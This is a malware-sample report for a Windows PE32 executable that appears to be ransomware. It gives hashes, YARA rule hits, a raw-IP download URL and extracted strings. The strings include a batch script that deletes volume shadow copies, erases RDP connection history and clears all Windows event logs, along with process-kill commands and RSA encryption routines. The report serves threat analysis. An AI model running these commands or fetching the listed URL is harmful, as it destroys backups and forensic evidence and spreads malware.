Sample details: 638b113d635506f70701f4029234d902 --

Hashes
MD5: 638b113d635506f70701f4029234d902
SHA1: 0612b1cbf8d2da09b035c915e6d6b6361a77d8b5
SHA256: 7061c90ea67558b014575f40bc69ff513ee553e127f190bb0a429e5b5710b378
SSDEEP: 1536:iQ7HUMNRSNXlgQHsxPDZEo5wTsl1axVZXx:iQzUORSNXlexJ5yxVFx
Details
File Type: PE32
Yara Hits
YRP/IsPE32 | YRP/IsWindowsGUI | YRP/IsBeyondImageSize | YRP/HasRichSignature | YRP/domain | YRP/contentis_base64 | YRP/System_Tools | YRP/Dropper_Strings | YRP/win_registry | YRP/win_files_operation | YRP/Prime_Constants_long |
Source
http://216.170.126.99/1.exe
http://216.170.126.99/1.exe
Strings
		!This program cannot be run in DOS mode.
'2_ocS1<cS1<cS1<
\l<aS1<j+
<nS1<cS0<'S1<n
<vS1<n
<bS1<RichcS1<
.rdata
c;: Nqcq
`_#:x?
?Ao b,A
~37@DP
taskkill /F /T /PID 
0123456789ABCDEF
SHA224
SHA256
SHA-256
sha224WithRSAEncryption
RSA with SHA-224
sha256WithRSAEncryption
RSA with SHA-256
RSASSA-PSS
rsaEncryption
id-ecPublicKey
Generic EC key
id-ecDH
EC key for ECDH
desCBC
DES-CBC
des-ede3-cbc
DES-EDE3-CBC
id-sha224
SHA-224
id-sha256
010001
{%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
C17AE579DD2B03045A4D0244AB1199CE0E9421AF5EEE01B62609A04B9A4510CC46F2310D599142B880418F315444E6651DBFC825130BA66C47286EB9759B3D99E19A7DA2235846AEFB9C95C09B8BC2135DC08C1414196E1047CE657B352B60A0A8121281777115B5B6F7C5DC0F70F96E42C7AB8809AD9A7B4AC876444D3EE712FEC49018A3540C01EDB2136AD3C6D085EC8B3C5B150B84C2BC8FA7DC7F9BAD31D0AC54972A1B5C33FFD92B12A459A495C1D8DE8F97E41689BBFAF24CDEB87E48A060F53314588F3B96EF6DFADB12CF34AE94D1FF75670BC2746ABBA3E3E76D122693A68C04F243AF05F8DA1D884B2FD36BEB88E933F6701C40D5E1FB2BE18CBF
outlook
postgre
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp 
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
{{IDENTIFIER}}
rsa_encrypt
rsa_genkey
UVWjD^V3
D$,PUUh
A		D$(
D$(3T>
Ht]Ht5Ht
L$0+L$4
s2j Y+
t2j Y+
y;9|$Xt
D$pCSP
9D$$u6j
uESUPU
L$ _^][
C9\$TvV
C;\$Tr
D$@PPj
4SUVWj03
\$4UW;X
;D$Pu{US
|$09G4
F9\$0u
D$4YYV
Ht_HuR
SVWjpj
$SVWPh
^]_[YY
UWhl&@
WPhhl@
D$LUWP
D$XVSP
t$ VWU
HeapCreate
HeapAlloc
CloseHandle
lstrcpyA
lstrcatA
lstrlenW
CreateProcessA
CreateToolhelp32Snapshot
Process32FirstW
Process32NextW
HeapReAlloc
HeapFree
GetProcessHeap
lstrlenA
GetLastError
GetFileSizeEx
WriteFile
ReadFile
SetFilePointerEx
CreateFileW
GetCurrentProcess
ExitProcess
GetCurrentThread
SetThreadPriority
GetLogicalDrives
GetStdHandle
SetFilePointer
FindClose
lstrcmpiA
lstrcmpiW
lstrcpynA
lstrcpyW
lstrcatW
GetModuleFileNameW
CreateProcessW
GetEnvironmentVariableW
GetDriveTypeA
GetTempFileNameW
SetFileAttributesW
GetFileAttributesW
FindFirstFileW
FindNextFileW
CopyFileW
MoveFileExW
SetPriorityClass
MultiByteToWideChar
WideCharToMultiByte
CompareStringA
KERNEL32.dll
wsprintfA
USER32.dll
CryptAcquireContextW
CryptReleaseContext
CryptGenRandom
GetCurrentHwProfileW
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
ADVAPI32.dll
ShellExecuteExW
SHChangeNotify
SHELL32.dll
StrStrA
PathFindFileNameW
PathRemoveFileSpecW
SHLWAPI.dll
_aulldiv
_alldiv
_allrem
ntdll.dll
UuidCreate
RPCRT4.dll
S-R.o[
wp`/kd
.j,W]p
02iae|{
wpCq	p
[#]ZOY
ZDm4Ni
tln	r.JLTXX
#r+2>-